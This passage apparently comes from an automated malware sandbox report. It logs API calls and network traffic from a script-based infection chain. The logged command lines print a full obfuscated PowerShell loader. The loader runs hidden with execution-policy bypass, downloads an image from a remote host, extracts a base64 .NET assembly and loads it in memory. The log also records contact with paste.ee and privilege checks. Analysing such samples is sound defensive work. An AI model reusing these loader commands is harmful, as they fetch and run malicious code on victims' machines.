vGEUUyQMlvGdgBMUyQMlvGHoUyQMlvGcUyQMlvGB3UyQMlvGGQUyQMlvGSUyQMlvGBSUyQMlvGG8UyQMlvGOQBtUyQMlvGEIUyQMlvGIUyQMlvGUyQMlvGsUyQMlvGCUyQMlvGUyQMlvGOQBtUyQMlvGEIUyQMlvGOQBtUyQMlvGEIUyQMlvGIUyQMlvGUyQMlvGsUyQMlvGCUyQMlvGUyQMlvGOQBtUyQMlvGEIUyQMlvGMgUyQMlvG5UyQMlvGG0UyQMlvGQgUyQMlvGgUyQMlvGCwUyQMlvGIUyQMlvGUyQMlvG5UyQMlvGG0UyQMlvGQgByUyQMlvGGUUyQMlvGZwBhUyQMlvGHMUyQMlvGbQUyQMlvG5UyQMlvGG0UyQMlvGQgUyQMlvGgUyQMlvGCwUyQMlvGIUyQMlvGUyQMlvG5UyQMlvGG0UyQMlvGQgUyQMlvG2UyQMlvGDkUyQMlvGbQBCUyQMlvGCUyQMlvGUyQMlvGLUyQMlvGUyQMlvGgUyQMlvGDkUyQMlvGbQBCUyQMlvGEMUyQMlvGOgBUUyQMlvGEgUyQMlvGZgBXUyQMlvGGkUyQMlvGbgBkUyQMlvGG8UyQMlvGdwBzUyQMlvGFQUyQMlvGSUyQMlvGBmUyQMlvGFQUyQMlvGZQBtUyQMlvGHUyQMlvGUyQMlvGVUyQMlvGBIUyQMlvGGYUyQMlvGOQBtUyQMlvGEIUyQMlvGLUyQMlvGUyQMlvGgUyQMlvGDkUyQMlvGbQBCUyQMlvGGgUyQMlvGdUyQMlvGBtUyQMlvGGwUyQMlvGYwB2UyQMlvGGcUyQMlvGOQBtUyQMlvGEIUyQMlvGKQUyQMlvGpUyQMlvGCcUyQMlvGKQUyQMlvGuUyQMlvGHIUyQMlvGZQBQUyQMlvGGwUyQMlvGQQBDUyQMlvGEUUyQMlvGKUyQMlvGUyQMlvGnUyQMlvGFQUyQMlvGSUyQMlvGBmUyQMlvGCcUyQMlvGLUyQMlvGBbUyQMlvGHMUyQMlvGdUyQMlvGByUyQMlvGGkUyQMlvGTgBnUyQMlvGF0UyQMlvGWwBDUyQMlvGEgUyQMlvGYQBSUyQMlvGF0UyQMlvGOQUyQMlvGyUyQMlvGCkUyQMlvGLgByUyQMlvGGUUyQMlvGUUyQMlvGBsUyQMlvGEEUyQMlvGQwBFUyQMlvGCgUyQMlvGJwBOUyQMlvGDYUyQMlvGegUyQMlvGnUyQMlvGCwUyQMlvGWwBzUyQMlvGHQUyQMlvGcgBpUyQMlvGE4UyQMlvGZwBdUyQMlvGFsUyQMlvGQwBIUyQMlvGGEUyQMlvGUgBdUyQMlvGDMUyQMlvGNgUyQMlvGpUyQMlvGC4UyQMlvGcgBlUyQMlvGFUyQMlvGUyQMlvGbUyQMlvGBBUyQMlvGEMUyQMlvGRQUyQMlvGoUyQMlvGCcUyQMlvGOQBtUyQMlvGEIUyQMlvGJwUyQMlvGsUyQMlvGFsUyQMlvGcwB0UyQMlvGHIUyQMlvGaQBOUyQMlvGGcUyQMlvGXQBbUyQMlvGEMUyQMlvGSUyQMlvGBhUyQMlvGFIUyQMlvGXQUyQMlvGzUyQMlvGDkUyQMlvGKQUyQMlvGgUyQMlvGCkUyQMlvG';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('UyQMlvG','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000057c	1	1
ShellExecuteExW Nov. 13, 2023, 10:55 a.m.	show_type: 0 filepath_r: powershell parameters: -command "$Codigo = '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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('UyQMlvG','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD" filepath: powershell	1	1
CreateProcessInternalW Nov. 13, 2023, 10:55 a.m.	thread_identifier: 2816 thread_handle: 0x00000448 process_identifier: 2812 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([STRINg]$verboSePrefeRenCe)[1,3]+'x'-join'')( ('N6zimageUrl = 9mBhttps://uploa'+'ddeimagen'+'s.com.br/images/004/654/536/original/new_image.'+'jpg?16989577509mB;N6zwebClient'+' = New-Object System.Net.WebClient;N6zimageBytes = N6zwebClient.DownloadData(N6zi'+'mageUrl);N6zimageText = [System.Text.Encoding]::UTF8.GetString(N6zimageBytes);N6zstartFlag = 9mB<<BASE64_START>>9mB;N6zendFlag = 9mB<<BASE64_END>>9mB;N6zstartInd'+'ex = N6zim'+'ageText.IndexOf(N6z'+'st'+'artFlag);N6zendIndex = N6zimageText.IndexOf(N6zendFlag);N6zstartIndex -ge 0 -and N6zendIndex -gt N6zstartIndex;N6zstartIndex'+' += N6z'+'startFlag.Le'+'ngth;N6zbase64Length = N6zendIndex - N6zstartIndex;N6zbase64Command = N6zimageText.Substring(N6zstartIndex, N6zbase'+'64Length);N6zcommandBytes = [System.Co'+'nvert]::Fr'+'omBase64String(N6zbase64Command'+');N6zloadedAssembly = [System.Reflection.Assembly]::Load(N6zcommandBytes);N6'+'ztype = N6zloade'+'dAssembly.GetT'+'ype(9mBFiber.Home9mB);N6zmethod = N6ztype.GetMethod(9mBVAI9mB).Inv'+'oke(N6znull, [object[]] (9mBdHh0LkNCTi8wNTIvMjMuOTQyLj'+'cyMS44ODEvLzpwdHRo9mB , 9mB9mB , 9mB29mB , 9mBregasm9mB , 9mB69mB , 9mBC:THfWindowsTHfTempTHf9mB, 9mBhtmlcvg9mB))').rePlACE('THf',[striNg][CHaR]92).rePlACE('N6z',[striNg][CHaR]36).rePlACE('9mB',[striNg][CHaR]39) )" filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 1 process_handle: 0x0000044c	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Nov. 13, 2023, 10:55 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (11 events)

Data received	[
Data received	WeQi.L²°ð:?ÝOR©/æÂ?ËµDOWNGRD ¨³-ÓdÖº\|3 o¹Ù\|tVåQÄV nd2À ÿ
Data received	Q
Data received
Data received	AÂ`7§,{XTC]¹Ìa¸½?ÆokátÑgòëJJugûÁUzÿ¦=Â¿¥yæSC`UG0E!ßá¦j&þÃñw§Û`ÆÙáAöEÄ@¨_¤³£ì K_{·ÎgZz"¦Vq°öaP¼(n-]#Z}
Data received
Data received
Data received
Data received
Data received	0
Data received	²4r÷L»Ø'þJz C VúÊôy³òaÈQcûçJÂP\q6"÷ýè3R

Poweshell is sending data to a remote host (2 events)

Data sent	yueQ UÞ:"<®Ùk6ä J/oTbÈÉ%/5 ÀÀÀ À 284ÿuploaddeimagens.com.br
Data sent	FBA¸Ùó!åÒÙwÛÂjä#z?@KvmûÅªCRúZýð,#Û.tö0¦-#ì©I¬2ØÞÀl0UÆtsÍ>a÷Ó¦hÐÚäI }WhIÑ&Î ¥¢d¹\»»Í @-×yUL

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Nov. 13, 2023, 10:55 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW Nov. 13, 2023, 10:55 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Wscript.exe initiated network communications indicative of a script based payload download (3 events)

Time & API	Arguments	Status	Return	Repeated
WSASend Nov. 13, 2023, 10:55 a.m.	buffer: kgeQ¥Ë¡®òHÐAú Ù¾YBBáãm/5 ÀÀÀ À 28&ÿ paste.ee socket: 592		0	0
WSASend Nov. 13, 2023, 10:55 a.m.	buffer: FBA]Yý;ÍöxÂÒ¥ÙDÓÝ¬áèü/±RôOökX® X°¦ô©äPÿ>Z òü.Óè >h^0ü¿+foglV¡®¨ìó¦b%\|oÄmÒçÃì¦ÿm*ºZ$é5$ socket: 592		0	0
WSASend Nov. 13, 2023, 10:55 a.m.	buffer: ÀO/ÇâèévtºèÒWr§G=x ïáÊ;ö×;dêd9^O×2I¦i¨aV¤Õ#æy÷Þnßèï¥¡<[º¨8RÏ>ß.¹8éõyíà4%'Ï¶\|Æ¸$J)´Ôq1S\<Ç½cå1aðw÷:Ô6X"®ëÄ!£Ûr±Õ/êÁ"kéZSøìÕÏÂ$bÐ¥Dù ¬~½7Õ¤$Vß«þE' socket: 592		0	0

Network communications indicative of a potential document or script payload download was initiated by the processes wscript.exe, powershell.exe (6 events)

Time & API	Arguments	Status	Return
WSASend Nov. 13, 2023, 10:55 a.m.	buffer: kgeQ¥Ë¡®òHÐAú Ù¾YBBáãm/5 ÀÀÀ À 28&ÿ paste.ee socket: 592		0
WSASend Nov. 13, 2023, 10:55 a.m.	buffer: FBA]Yý;ÍöxÂÒ¥ÙDÓÝ¬áèü/±RôOökX® X°¦ô©äPÿ>Z òü.Óè >h^0ü¿+foglV¡®¨ìó¦b%\|oÄmÒçÃì¦ÿm*ºZ$é5$ socket: 592		0
